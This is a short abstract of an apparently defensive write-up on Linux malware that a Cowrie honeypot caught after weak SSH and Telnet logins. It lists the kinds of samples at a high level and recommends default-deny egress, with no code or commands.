Static Analysis of Linux Malware Captured by a Cowrie Honeypot

When a bot thinks it has logged into a small energy device, it installs commodity Linux malware. This is a static, defensive breakdown of what a honeypot captured after weak SSH and Telnet logins: fake-daemon binaries that masquerade as sshd and xinetd, a statically linked bot, a backdoor with three independent persistence mechanisms, and a self-deleting campaign visible only through commands. The payloads are ordinary, but the chain is the lesson: weak login, host fingerprint, payload staging, persistence, and reach-out. Default-deny egress breaks the last step.